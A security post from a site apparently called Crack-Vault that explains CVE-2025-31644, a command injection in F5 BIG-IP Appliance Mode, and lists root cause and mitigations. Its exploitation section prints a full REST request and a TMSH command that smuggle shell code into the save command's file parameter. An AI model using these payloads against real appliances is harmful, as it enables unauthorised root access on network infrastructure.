Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

🚨 CVE-2025-31644: Critical Command Injection Vulnerability in F5 BIG-IP

NikolasHume

CVE-2025-31644: Command Injection Vulnerability in F5 BIG-IP (Appliance Mode)

Date: May 13, 2025
Tags: CVE-2025-31644, F5 BIG-IP, Command Injection, Appliance Mode, Exploit

Overview

A critical vulnerability identified as CVE-2025-31644 affects F5 BIG-IP systems running in Appliance Mode. It allows authenticated administrators to perform remote code execution (RCE) by exploiting command injection via the save command’s file parameter.

This issue arises from unsafe handling of user-supplied values, which are passed directly into Perl scripts or shell commands, leading to exploitation using shell metacharacters.

Affected Environment

F5 BIG-IP Version: 16.1.4.1
Vulnerable Only in: Appliance Mode
Required Role for Exploitation: Administrator (via REST API or TMSH over SSH)

Root Cause

The file parameter of the save command is not sanitized properly before being passed to system-level scripts. This allows attackers to:

Inject commands using backticks (`) or other shell metacharacters
Execute arbitrary bash commands as root
Bypass Appliance Mode restrictions that would normally block shell access

Exploitation Vectors

1. Via REST API (`/mgmt`)

Request:

POST /mgmt/tm/sys/config HTTP/1.1
Host: <target>
Authorization: Basic <admin-creds>
Content-Type: application/json
Content-Length: 148

{
  "command": "save",
  "options": [
    {
      "file": "/var/tmp/`bash'${IFS}-c${IFS}'id'|'tee'${IFS}-a${IFS}'mal_was_here`.scf",
      "passphrase": "aaaa"
    }
  ]
}

Response:
Even though the server returns a 400 Bad Request with an encryption failure message, the injected command (id) executes successfully and its output is logged.

2. Via TMSH (over SSH)

Command:

save sys config file /var/tmp/`bash'${IFS}-c${IFS}'id'${IFS}'>&2`.scf no-passphrase

Effect:
The id command runs as root. Output redirection (>&2) ensures the result is printed to STDERR, confirming success.

Key Observations

Only administrator users can exploit this due to needing access to the file parameter.
All command injection relies on embedding shell code into the file parameter.
Shell metacharacters like `, |, and ${IFS} are used to evade basic filtering.
This is only a vulnerability in Appliance Mode, where such commands should be blocked.

Mitigation

Upgrade to Patched Version (if released by F5).
Restrict Administrator Access to only trusted users.
Monitor Logs for suspicious usage of the save command with file paths in /var/tmp/.
Isolate REST API Access from untrusted networks.

References

PoC PDF on GitHub
---

Conclusion

CVE-2025-31644 is a high-severity vulnerability that allows authenticated admin users to gain root shell access in restricted Appliance Mode environments. This vulnerability demonstrates the risks of insecure parameter handling even in tightly controlled admin interfaces. Organizations using F5 BIG-IP should audit usage, apply patches promptly, and monitor for suspicious config-saving operations.

Stay secure. Patch often. Audit always.

Hurokuu2q

Nice

📱

Download Now—Top Software, No Cost!